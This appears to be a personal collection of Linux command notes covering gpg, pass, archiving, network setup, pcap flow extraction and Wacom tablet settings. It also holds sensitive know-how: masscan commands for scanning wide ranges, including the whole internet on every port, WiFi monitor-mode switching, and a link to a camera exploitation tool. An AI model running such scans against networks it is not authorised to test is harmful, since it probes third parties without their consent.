$ gpg --encrypt --sign -r WBBellamy@gmail.com name_of_file
To decrypt a file:
$ gpg file_name
Symmetric encryption:
$ gpg2 --symmetric myfile
List your GPG keys:
$ gpg --list-keys

---- Backing up your public key
List your public keys:
gpg --list-keys
Look for the line that starts something like "pub 1024D/". The part after the 1024D/ is the key-id.
To export the key:
gpg -ao _something_-public.key --export key-id

Backing up your private key
List your private keys:
gpg --list-secret-keys
Look for the line that starts something like "sec 1024D/". The part after the 1024D/ is the key-id.
To export the private key:
gpg -ao _something_-private.key --export-secret-keys key-id

Restoring your keypair
Copy the two files created above to the machine and enter the following commands:
gpg --import _something_-public.key
gpg --import _something_-private.key
Make sure you protect these files!

To change your passphrase:
Enter: gpg --edit-key key-id
At the gpg prompt enter: passwd
Enter the current passphrase when prompted.
Enter the new passphrase twice when prompted.
Enter: save

To encrypt a file:
gpg --encrypt --sign --armor -r mary-geek@protonmail.com filename
To decrypt a file:
gpg --decrypt coded.asc > plain.txt

Insert a new password record:
$ pass insert archlinux.org/wiki/username
View the password store:
$ pass
Generate a new random password, where n is the desired password length as a number:
$ pass generate archlinux.org/wiki/username n
To retrieve a password, enter the gpg passphrase at the prompt that follows:
$ pass archlinux.org/wiki/username
You can edit an existing entry with:
$ pass edit password_name
If we no longer need the password, we can remove it with pass rm:
$ pass rm google.com/gmail/example@gmail.com
Backup your password-store:
$ tar -cz .password-store \
| gpg --sign --encrypt -r 0x77BB8872 \
> password-store-backup.tar.gz.gpg
This directory can be restored in a similar way:
$ gpg --decrypt \
< password-store-backup.tar.gz.gpg \
| tar -xz

============================================
= pass: the standard unix password manager =
=                                          =
=                  v1.7.1                  =
=                                          =
=             Jason A. Donenfeld           =
=               Jason@zx2c4.com            =
=                                          =
=      http://www.passwordstore.org/       =
============================================

Usage:
pass init [--path=subfolder,-p subfolder] gpg-id...
Initialize new password storage and use gpg-id for encryption. Selectively reencrypt existing passwords using new gpg-id.
pass [ls] [subfolder]
List passwords.
pass find pass-names...
List passwords that match pass-names.
pass [show] [--clip[=line-number],-c[line-number]] pass-name
Show existing password and optionally put it on the clipboard. If put on the clipboard, it will be cleared in 45 seconds.
pass grep search-string
Search for password files containing search-string when decrypted.
pass insert [--echo,-e | --multiline,-m] [--force,-f] pass-name
Insert new password. Optionally, echo the password back to the console during entry. Or, optionally, the entry may be multiline. Prompt before overwriting existing password unless forced.
pass edit pass-name
Insert a new password or edit an existing password using editor.
pass generate [--no-symbols,-n] [--clip,-c] [--in-place,-i | --force,-f] pass-name [pass-length]
Generate a new password of pass-length (or 25 if unspecified) with optionally no symbols. Optionally put it on the clipboard and clear board after 45 seconds. Prompt before overwriting existing password unless forced. Optionally replace only the first line of an existing file with a new password.
pass rm [--recursive,-r] [--force,-f] pass-name
Remove existing password or directory, optionally forcefully.
pass mv [--force,-f] old-path new-path
Renames or moves old-path to new-path, optionally forcefully, selectively reencrypting.
pass cp [--force,-f] old-path new-path
Copies old-path to new-path, optionally forcefully, selectively reencrypting.
pass git git-command-args...
If the password store is a git repository, execute a git command specified by git-command-args.
pass help
Show this text.
pass version
Show version information.
More information may be found in the pass(1) man page.
$ journalctl - Query the systemd journal
This will compress file.txt and create file.txt.gz; note that this removes the original file.txt.
$ gzip file.txt
You can instead keep the original file and create a compressed copy:
$ gzip -c file.txt > file.txt.gz
$ gzip -k file.txt
This compresses all files given on the command line; note again that it removes the originals, turning file1.txt, file2.txt and file3.txt into file1.txt.gz, file2.txt.gz and file3.txt.gz.
$ gzip file1.txt file2.txt file3.txt
All files within a directory and all its subdirectories can be compressed recursively with the -r flag:
$ gzip -r directory/
To reverse the compression and get back the original file, use the gzip command itself or gunzip, which is also part of the gzip package.
$ gzip -d file.txt.gz
OR
$ gunzip file.txt.gz
Get info about an archive:
$ gzip -l linux-3.18.19.tar.gz
or
$ gzip -v linux-3.18.19.tar.gz
Compress a directory:
$ tar czvf etc.tar.gz /etc/
List available access points:
$ nmcli dev wifi list
$ sudo iwlist wlp2s0 scan
$ sudo lshw -C network
Change to monitor mode and back to managed:
$ sudo ifconfig wlp2s0 down
$ sudo iwconfig wlp2s0 mode Monitor
$ sudo ifconfig wlp2s0 up
$ sudo iwconfig
$ sudo iwconfig wlp2s0 mode Managed
Set the channel:
$ sudo iw dev wlp2s0 set channel 6
$ sudo iwconfig wlp2s0 channel 6
Check for blocked WiFi interfaces:
$ rfkill list
$ rfkill unblock wifi
Set the AP you want to connect to (network-essid):
$ sudo iwconfig wlan0 essid network-essid
Set your frequency:
$ sudo iwconfig wlan0 freq 2.422G
Compress an entire directory or a single file:
$ tar -czvf name-of-archive.tar.gz /path/to/directory-or-file
or
$ tar -czvf name-of-archive.tgz /path/to/directory-or-file
Extract a tarball into the current directory:
$ tar -xvf archive.tar
Extract a tar gz file (.tar.gz or .tgz) into the /tmp directory:
$ tar -xzvf archive.tar.gz -C /tmp
Find files, case-insensitive:
$ find /home/username/ -type f -iname "*.err"
Find all .db files (ignoring text case) modified in the last 7 days by a user named exampleuser:
$ find /home -user exampleuser -mtime -7 -iname "*.db"
For CPU temps, combine watch with the sensors command:
$ watch -n 2 sensors
[19:03:15 benb ~] $ ip a
1: lo: (LOOPBACK,UP,LOWER_UP) mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eno1: (BROADCAST,MULTICAST,UP,LOWER_UP) mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 5c:26:0a:69:40:2a brd ff:ff:ff:ff:ff:ff
inet 10.32.10.184/24 brd 10.32.10.255 scope global dynamic noprefixroute eno1
valid_lft 5538sec preferred_lft 5538sec
inet6 fe80::b756:c126:14b3:9eff/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: wlp2s0: (BROADCAST,MULTICAST) mtu 1500 qdisc fq_codel state DOWN group default qlen 1000
link/ether c0:f8:da:79:de:fc brd ff:ff:ff:ff:ff:ff

eno1 inet 10.32.10.184/24 brd 10.32.10.255 scope global dynamic noprefixroute eno1

Set an address by hand:
ifconfig (interface_name) (ip_address) netmask (netmask_address)
ifconfig eno1 192.168.0.84 netmask 255.255.255.0

[19:09:55 benb ~] $ ifconfig
eno1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500
inet 192.168.0.84 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::b756:c126:14b3:9eff prefixlen 64 scopeid 0x20(link)
ether 5c:26:0a:69:40:2a txqueuelen 1000 (Ethernet)
RX packets 130081 bytes 21198024 (21.1 MB)
RX errors 0 dropped 1 overruns 0 frame 0
TX packets 68144 bytes 4779465 (4.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 20 memory 0xe2e00000-e2e20000

lo: flags=73(UP,LOOPBACK,RUNNING) mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10(host)
loop txqueuelen 1000 (Local Loopback)
RX packets 31630 bytes 2678442 (2.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 31630 bytes 2678442 (2.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

In order to change your IP address on Linux, you will have to add your network configuration to "/etc/network/interfaces", or create this file if it does not exist already.
# Content of /etc/network/interfaces
iface eth0 inet static
address (ip_address)
netmask (network_mask)
gateway (gateway_ip)
To change your IP address, edit the content of your interfaces file and add the following:
$ vim /etc/network/interfaces
# Content of /etc/network/interfaces
iface eth0 inet static
address 192.168.178.32
netmask 255.255.255.0
gateway 192.168.178.1
For the changes to be applied, you will need to restart your networking service (managed by ifupdown):
# For systemd hosts
$ sudo systemctl restart networking.service
# For pre-systemd hosts
$ sudo /etc/init.d/networking restart
masscan 10.0.0.0/8 -S -p80 --banners --source-ip 192.16.1.200
masscan 10.0.0.0/8 -S -p80 --banners --source-port 6000
$ sudo masscan
usage:
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
scan some web ports on 10.x.x.x at 10kpps
masscan --nmap
list those options that are compatible with nmap
masscan -p80 10.0.0.0/8 --banners -oB <filename>
save results of scan in binary format to <filename>
masscan --open --banners --readscan <filename> -oX <savefile>
read binary scan results in <filename> and save them as xml in <savefile>
masscan -p80,8000-8100 10.0.0.0/8 --echo > xxx.conf
$ cat xxx.conf
seed = 7993459462523355382
rate = 100
shard = 1/1
nocapture = servername
# TARGET SELECTION (IP, PORTS, EXCLUDES)
ports = 80,8000-8100
range = 10.0.0.0/8
Single-port scans
$ masscan 10.11.0.0/16 -p443
Multi-port scans
$ masscan 10.11.0.0/16 -p80,443
Scan a range of ports
$ masscan 10.11.0.0/16 -p22-25
Scan n number of nmap's top ports
$ masscan 10.11.0.0/16 --top-ports 100
Scan a single IP and port
./masscan 198.134.112.244 -p443
./masscan 198.134.112.240/28 -p80,443,25 #multiple ports
./masscan 198.134.112.240/28 -p1000-9999 #range of ports
Scanning the top 10 ports
masscan 192.168.1.105 --top-ports 10
# masscan 10.0.0.0/8 -p80 --banners --source-ip 192.168.1.200
# masscan 2a00:1450:4007:810::/112 -p80 --banners --source-ip 2603:3001:2d00:da00:91d7:b54:b498:859d
# masscan 0.0.0.0/0 -p0-65535 --max-rate 100000
https://github.com/robertdavidgraham/masscan
$ sudo masscan 192.168.1.0/24 -p80
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-28 02:26:34 GMT
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.1.254
Discovered open port 80/tcp on 192.168.1.94
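Turning the "Discovered open port" lines above into something you can diff against what should be open on your own network, as an added Python example (not code from these notes or from masscan). The sample text is a constructed copy of the scan output above with one extra 23/tcp line and a duplicate, so de-duplication and the allow-list check both have work to do; the function names are mine.

```python
import ipaddress
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: the masscan output quoted above, plus one extra
# 23/tcp line and a repeated line so the parser has something to flag and dedupe.
SAMPLE_MASSCAN_OUTPUT = """\
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-28 02:26:34 GMT
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.1.254
Discovered open port 80/tcp on 192.168.1.94
Discovered open port 23/tcp on 192.168.1.94
Discovered open port 80/tcp on 192.168.1.94
"""

_DISCOVERED = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")

Finding = Tuple[str, int, str]  # (ip, port, proto)


def parse_masscan(text: str) -> List[Finding]:
    """Return the unique (ip, port, proto) findings, sorted by address then port."""
    seen: Set[Finding] = set()
    for line in text.splitlines():
        m = _DISCOVERED.search(line)
        if m:
            port, proto, ip = m.groups()
            seen.add((ip, int(port), proto))
    # Sort numerically on the address so 192.168.1.94 comes before 192.168.1.254.
    return sorted(seen, key=lambda f: (ipaddress.ip_address(f[0]), f[1], f[2]))


def by_host(findings: List[Finding]) -> Dict[str, List[str]]:
    """Group findings as {ip: ["port/proto", ...]} for a quick inventory view."""
    hosts: Dict[str, List[str]] = {}
    for ip, port, proto in findings:
        hosts.setdefault(ip, []).append(f"{port}/{proto}")
    return hosts


def unexpected(findings: List[Finding], allowlist: Dict[str, Set[str]]) -> List[Finding]:
    """Findings not covered by the allow-list.

    allowlist maps ip -> set of "port/proto" strings that are supposed to be
    reachable; anything else that answered the scan is worth a ticket.
    """
    return [f for f in findings if f"{f[1]}/{f[2]}" not in allowlist.get(f[0], set())]


if __name__ == "__main__":
    found = parse_masscan(SAMPLE_MASSCAN_OUTPUT)
    # Constructed allow-list: only the two web servers the scan above revealed.
    expected = {"192.168.1.254": {"80/tcp"}, "192.168.1.94": {"80/tcp"}}
    print(by_host(found))
    print("unexpected:", unexpected(found, expected))
```

Feed it the saved stdout of a scan (or the -oL list output, whose lines use the same "open tcp 80 192.168.1.94" fields in a different order, so the regex would need adjusting) and keep the allow-list in version control; the diff between runs is the change you actually care about.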
https://www.kitploit.com/2021/06/camover-camera-exploitation-tool-that.html?m=1
pcap_flows: <pcap>
Version: Jun 8 2021 14:28:11
Contact: support at fmad.io
Options:
--output-tcp <filename> | write TCP output to the specified file name
--output-udp <filename> | write UDP output to the specified file name
--packet-max <number> | only process the first <number> packets
--flow-max <number> | sets max flow count to <number> packets
--flow-hash-bits <number> | sets number of bits to use for the flow hash index
--extract <number> | extract FlowID <number> into the output PCAP file
--extract-port <min port> <max port> | extract ports between min/max
--extract-ip <address/netmask> | extract only a subnet
--extract-tcp <number> | extract FlowID <number> as a TCP stream to the output file name
--extract-tcp-port <min port> <max port> | extract all TCP flows with the specified port in src or dest
--extract-tcp-all | extract all TCP flows
--disable-tcp-port <min port> <max port> | do not extract TCP ports within this range
--stdin | read pcap from stdin. e.g. zcat capture.pcap | pcap_flows --stdin
--flow-packet-min <number> | minimum packet count to display flow info
--disable-display | do not display flow information to stdout
--cpu <number> | pin thread to a specific CPU
--flow-size-min <bytes> | minimum file size to flow creation
--metamako | decode metamako footer
--metamako-double | decode double tagged metamako footer
--metamako-offset <bytes> | manual offset for metamako pcap footer
--tcpheader | include TCP header in output
--udpheader | include UDP header in output

### Examples
1) generate flow information from a compressed PCAP file
zcat capture.pcap.gz | pcap_flows --stdin
2) output a specific flow to a separate PCAP file
pcap_flows --extract 1234 raw_capture.pcap -o capture_flow_1234.pcap
3) extract a TCP stream from a pcap
pcap_flows --extract-tcp 1234 raw_capture.pcap -o capture_flow_as_tcp1234.pcap
3) extract all TCP streams from port 80 to port 80
Note: this can generate a very large number of files (one per stream) in the output directory, e.g. /tmp/tcp_stream_directory/extract_192.168.1.1-80->12345.pcap
pcap_flows /mnt/capture/hitcon_small.pcap --extract-tcp-port 80 80 -o ./tmp/port80_
$ ls tmp/port80* | wc -l
20217
$ hexdump -Cv "tmp/port80__00:10:18:72:00:3c->e0:3f:49:6a:af:a1_117. 27.153. 29-> 10. 5. 9.102_ 80-> 62374" | head
00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d |HTTP/1.1 200 OK.|
00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a |.Server: nginx..|
00000020 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 41 75 |Date: Fri, 08 Au|
00000030 67 20 32 30 31 34 20 31 37 3a 34 39 3a 35 38 20 |g 2014 17:49:58 |
00000040 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |GMT..Content-Typ|
00000050 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 |e: image/jpeg..C|
00000060 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 |ontent-Length: 1|
00000070 32 32 33 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e |2232..Connection|
00000080 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f |: close..Last-Mo|
00000090 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 39 20 |dified: Tue, 29 |
...

### TCP Output format
The default TCP output format is a flat linear file of the re-assembled TCP stream. However, with the --tcpheader flag each successfully re-assembled TCP segment is preceded by a header. The header format is:
typedef struct
{
u64 TS; // nanosecond timestamp
u16 Length; // number of bytes in this packet
u16 StreamID; // unique id per flow
} TCPOutputHeader_t;
This allows parsing a TCP stream like parsing a UDP packet stream. Each output TCP packet is a single reassembled TCP segment written in-order, with no re-sends and no sequence gaps.

### Output
Display flow info from the hitcon defcon CTF capture:
pcap_flows /hitcon.pcap --flow-packet-min 1000
1048549 FlowID: 592897 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 17. 2 -> 10. 5. 9. 2 | 43942 -> 8888 | 4,102 Pkts 288,909 Bytes
1048550 FlowID: 761379 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 3. 2 -> 10. 5. 9. 2 | 48716 -> 8888 | 4,113 Pkts 289,197 Bytes
1048551 FlowID: 981924 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 7. 2 -> 10. 5. 9. 2 | 42653 -> 8888 | 4,183 Pkts 294,250 Bytes
1048552 FlowID: 642639 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 17.253. 2.226 | 63281 -> 80 | 4,301 Pkts 295,014 Bytes
1048553 FlowID: 902015 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 12. 2 -> 10. 5. 9. 2 | 36486 -> 8888 | 4,352 Pkts 305,988 Bytes
1048554 FlowID: 53839 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 16. 2 -> 10. 5. 9. 2 | 43103 -> 8888 | 4,715 Pkts 331,990 Bytes
1048555 FlowID: 658515 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 15. 2 -> 10. 5. 9. 2 | 45683 -> 8888 | 4,786 Pkts 337,001 Bytes
1048556 FlowID: 33656 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 130.204. 67.136 -> 10. 5. 9.102 | 9025 -> 56574 | 4,930 Pkts 537,324 Bytes
1048557 FlowID: 643944 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 10. 2 -> 10. 5. 9. 2 | 44934 -> 8888 | 4,995 Pkts 351,892 Bytes
1048558 FlowID: 8462 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 2. 2 -> 10. 5. 9. 2 | 41809 -> 8888 | 5,126 Pkts 360,763 Bytes
1048559 FlowID: 627433 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 8. 2 -> 10. 5. 9. 2 | 44283 -> 8888 | 5,394 Pkts 379,946 Bytes
1048560 FlowID: 88064 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 140.115. 50. 51 -> 10. 5. 9.102 | 22 -> 42271 | 6,102 Pkts 417,083 Bytes
1048561 FlowID: 24006 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 74.125.129.189 -> 10. 5. 9.102 | 443 -> 61860 | 6,502 Pkts 658,192 Bytes
1048562 FlowID: 785299 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 53303 | 6,559 Pkts 9,849,540 Bytes
1048563 FlowID: 23999 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 74.125.129.189 | 61860 -> 443 | 6,588 Pkts 2,583,463 Bytes
1048564 FlowID: 33651 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 130.204. 67.136 | 56574 -> 9025 | 6,609 Pkts 622,258 Bytes
1048565 FlowID: 1005605 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 10. 5. 6.108 | 63779 -> 80 | 7,149 Pkts 453,291 Bytes
1048566 FlowID: 786260 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 53413 | 8,367 Pkts 12,625,278 Bytes
1048567 FlowID: 642795 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 54.183.128. 64 | 52940 -> 22222 | 10,502 Pkts 2,409,657 Bytes
1048568 FlowID: 88059 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 140.115. 50. 51 | 42271 -> 22 | 10,955 Pkts 16,496,355 Bytes
1048569 FlowID: 1 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 54.183.128. 64 | 51697 -> 22222 | 11,666 Pkts 3,839,832 Bytes
1048570 FlowID: 1005606 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 63779 | 14,670 Pkts 21,774,873 Bytes
1048571 FlowID: 2 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 54.183.128. 64 -> 10. 5. 9.102 | 22222 -> 51697 | 16,714 Pkts 1,830,744 Bytes
1048572 FlowID: 642798 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 54.183.128. 64 -> 10. 5. 9.102 | 22222 -> 52940 | 16,997 Pkts 1,921,123 Bytes
1048573 FlowID: 642638 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 17.253. 2.226 | 63280 -> 80 | 98,135 Pkts 6,584,162 Bytes
1048574 FlowID: 642642 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 17.253. 2.226 -> 10. 5. 9.102 | 80 -> 63280 | 115,911 Pkts 245,630,927 Bytes
...
Extract only port 80 traffic from hitcon.pcap to a separate file. This is the individual TCP port 80 -> 63280 flow:
1048574 **FlowID: 642642** | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 17.253. 2.226 -> 10. 5. 9.102 | 80 -> 63280 | 115,911 Pkts 245,630,927 Bytes
...
$ pcap_flows hitcon.pcap --extract 642642 -o /mnt/capture/hitcon_http.pcap --disable-display
writing PCAP to [/mnt/capture/hitcon_http.pcap]
[/mnt/capture/hitcon_small.pcap] FileSize: 2GB
[02:00:30.000.332.313 0.000%] Flows:2 0.00M Pkts 0.000Gbps : 0.00GB Out:0.00GB
[05:10:22.000.316.568 0.307%] Flows:899478 2.66M Pkts 7.419Gbps : 0.79GB Out:0.25GB
[02:27:22.000.060.690 0.816%] Flows:1048576 9.71M Pkts 12.695Gbps : 2.16GB Out:0.25GB
...
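A reader for the --tcpheader stream format described in the "TCP Output format" section above, as an added Python example (not code from these notes or from the pcap_flows project). The README only gives the C struct (u64 TS, u16 Length, u16 StreamID); this example assumes the header is written little-endian with no padding, which makes it 12 bytes, and that assumption is mine, not the README's. The sample stream is constructed in the block, and the function names are mine.

```python
import struct
from typing import Dict, Iterator, List, Tuple

# TCPOutputHeader_t from the pcap_flows README: u64 TS, u16 Length, u16 StreamID.
# Assumed here (not stated by the README): little-endian, packed, 12 bytes.
HEADER = struct.Struct("<QHH")

Segment = Tuple[int, int, bytes]  # (timestamp_ns, stream_id, payload)


def iter_segments(data: bytes) -> Iterator[Segment]:
    """Walk a --tcpheader output file, yielding one reassembled segment at a time.

    A header whose Length runs past the end of the data, or leftover bytes too
    short to be a header, mean a truncated or corrupt file and raise ValueError
    rather than silently yielding a short payload.
    """
    off = 0
    while off + HEADER.size <= len(data):
        ts, length, stream_id = HEADER.unpack_from(data, off)
        off += HEADER.size
        payload = data[off:off + length]
        if len(payload) < length:
            raise ValueError(
                f"truncated segment at offset {off - HEADER.size}: "
                f"header promises {length} bytes, {len(payload)} available"
            )
        yield ts, stream_id, payload
        off += length
    if off != len(data):
        raise ValueError(f"{len(data) - off} trailing bytes do not form a complete header")


def pack_segment(ts_ns: int, stream_id: int, payload: bytes) -> bytes:
    """Inverse of iter_segments, used here only to build the constructed sample."""
    return HEADER.pack(ts_ns, len(payload), stream_id) + payload


def split_streams(data: bytes) -> Dict[int, bytes]:
    """Concatenate payloads per StreamID in file order.

    The README states segments are already in order with no re-sends and no
    gaps, so simple concatenation gives the application-layer byte stream.
    """
    streams: Dict[int, List[bytes]] = {}
    for _ts, sid, payload in iter_segments(data):
        streams.setdefault(sid, []).append(payload)
    return {sid: b"".join(parts) for sid, parts in streams.items()}


def reassemble(data: bytes, stream_id: int) -> bytes:
    return split_streams(data).get(stream_id, b"")


# Constructed sample: two segments of stream 7 interleaved with one of stream 9,
# timestamps in nanoseconds since the epoch (arbitrary values).
SAMPLE_STREAM = (
    pack_segment(1_407_520_198_000_000_000, 7, b"HTTP/1.1 200 OK\r\n")
    + pack_segment(1_407_520_198_000_100_000, 9, b"GET / HTTP/1.1\r\n")
    + pack_segment(1_407_520_198_000_200_000, 7, b"Server: nginx\r\n")
)

if __name__ == "__main__":
    for ts, sid, payload in iter_segments(SAMPLE_STREAM):
        print(ts, sid, payload)
    print(split_streams(SAMPLE_STREAM))
```

If a real --tcpheader file parses into nonsense with this layout (absurd lengths on the first record), the endianness or packing assumption is wrong; the fix is to change the "<QHH" format string, not to relax the truncation checks, which are what keep a corrupt capture from being misread as valid application data.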
The Wacom pad allows me to draw with a stylus. I use the Gromit-MPX program to draw anywhere on the screen.
$ xsetwacom
Usage: xsetwacom [options] [command [arguments...]]
Options:
-h, --help - usage
-v, --verbose - verbose output
-V, --version - version info
-d, --display "display" - override default display
-s, --shell - generate shell commands for 'get'
-x, --xconf - generate xorg.conf lines for 'get'
Commands:
--list devices - display detected devices
--list parameters - display supported parameters
--list modifiers - display supported modifier and specific keys for keystrokes
--set "device name" parameter [values...] - set device parameter by name
--get "device name" parameter [param...] - get current device parameter(s) value by name

$ xsetwacom --list devices
Wacom One by Wacom S Pen stylus id: 17 type: STYLUS
Wacom One by Wacom S Pen eraser id: 18 type: ERASER

$ xsetwacom --list parameters
Area - Valid tablet area in device coordinates.
Button - X11 event to which the given button should be mapped.
ToolDebugLevel - Level of debugging trace for individual tools (default is 0 [off]).
TabletDebugLevel - Level of debugging statements applied to shared code paths between all tools associated with the same tablet (default is 0 [off]).
Suppress - Number of points trimmed (default is 2).
RawSample - Number of raw data used to filter the points (default is 4).
PressureCurve - Bezier curve for pressure (default is 0 0 100 100 [linear]).
Mode - Switches cursor movement mode (default is absolute).
TabletPCButton - Turns on/off Tablet PC buttons (default is off for regular tablets, on for Tablet PC).
Touch - Turns on/off Touch events (default is on).
HWTouchSwitchState - Touch events turned on/off by hardware switch.
Gesture - Turns on/off multi-touch gesture events (default is on).
ZoomDistance - Minimum distance for a zoom gesture (default is 50).
ScrollDistance - Minimum motion before sending a scroll gesture (default is 20).
TapTime - Minimum time between taps for a right click (default is 250).
CursorProximity - Sets cursor distance for proximity-out in distance from the tablet (default is 10 for Intuos series, 42 for Graphire series).
Rotate - Sets the rotation of the tablet. Values = none, cw, ccw, half (default is none).
RelWheelUp - X11 event to which relative wheel up should be mapped.
RelWheelDown - X11 event to which relative wheel down should be mapped.
AbsWheelUp - X11 event to which absolute wheel up should be mapped.
AbsWheelDown - X11 event to which absolute wheel down should be mapped.
AbsWheel2Up - X11 event to which absolute wheel up should be mapped.
AbsWheel2Down - X11 event to which absolute wheel down should be mapped.
StripLeftUp - X11 event to which left strip up should be mapped.
StripLeftDown - X11 event to which left strip down should be mapped.
StripRightUp - X11 event to which right strip up should be mapped.
StripRightDown - X11 event to which right strip down should be mapped.
Threshold - Sets tip/eraser pressure threshold (default is 27).
ResetArea - Resets the bounding coordinates to default in tablet units.
ToolType - Returns the tool type of the associated device.
ToolSerial - Returns the serial number of the current device in proximity.
ToolID - Returns the tool ID of the current tool in proximity.
ToolSerialPrevious - Returns the serial number of the previous device in proximity.
BindToSerial - Binds this device to the serial number.
TabletID - Returns the tablet ID of the associated device.
PressureRecalibration - Turns on/off Tablet pressure recalibration
MapToOutput - Map the device to the given output.
all - Get value for all parameters.

$ xsetwacom --get 'Wacom One by Wacom S Pen stylus' all
Option "Area" "0 0 15200 9500"
Button: Actions are not supported by xorg.conf. Try shell format (-s) instead.
Button: Actions are not supported by xorg.conf. Try shell format (-s) instead.
Button: Actions are not supported by xorg.conf. Try shell format (-s) instead.
Option "DebugLevel" "0"
Option "CommonDBG" "0"
Option "Suppress" "2"
Option "RawSample" "4"
Option "PressCurve" "0 0 100 100"
Option "Mode" "Absolute"
Option "TPCButton" "off"
Option "Touch" "off"
Property 'Wacom Hardware Touch Switch' does not exist on device.
Option "Gesture" "off"
Option "ZoomDistance" "0"
Option "ScrollDistance" "0"
Option "TapTime" "250"
Property 'Wacom Proximity Threshold' does not exist on device.
Option "Rotate" "none"
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Wheel Buttons' does not exist on device.
Property 'Wacom Strip Buttons' does not exist on device.
Property 'Wacom Strip Buttons' does not exist on device.
Property 'Wacom Strip Buttons' does not exist on device.
Property 'Wacom Strip Buttons' does not exist on device.
Option "Threshold" "26"
Option "Serial" "0"
Option "PressureRecalibration" "on"

┌──(parth㉿parth)-[/etc/X11]
$ sudo xinput list
⎡ Virtual core pointer id=2 [master pointer (3)]
⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
⎜ ↳ Logitech M510 id=9 [slave pointer (2)]
⎜ ↳ DELL09F5:00 04F3:30CB Mouse id=11 [slave pointer (2)]
⎜ ↳ DELL09F5:00 04F3:30CB Touchpad id=12 [slave pointer (2)]
⎜ ↳ ETPS/2 Elantech Touchpad id=15 [slave pointer (2)]
⎜ ↳ Wacom One by Wacom S Pen stylus id=17 [slave pointer (2)]
⎜ ↳ Wacom One by Wacom S Pen eraser id=18 [slave pointer (2)]
⎣ Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]
↳ Video Bus id=6 [slave keyboard (3)]
↳ Power Button id=7 [slave keyboard (3)]
↳ Sleep Button id=8 [slave keyboard (3)]
↳ Integrated_Webcam_HD: Integrate id=10 [slave keyboard (3)]
↳ Dell WMI hotkeys id=13 [slave keyboard (3)]
↳ AT Translated Set 2 keyboard id=14 [slave keyboard (3)]
↳ DELL Wireless hotkeys id=16 [slave keyboard (3)]
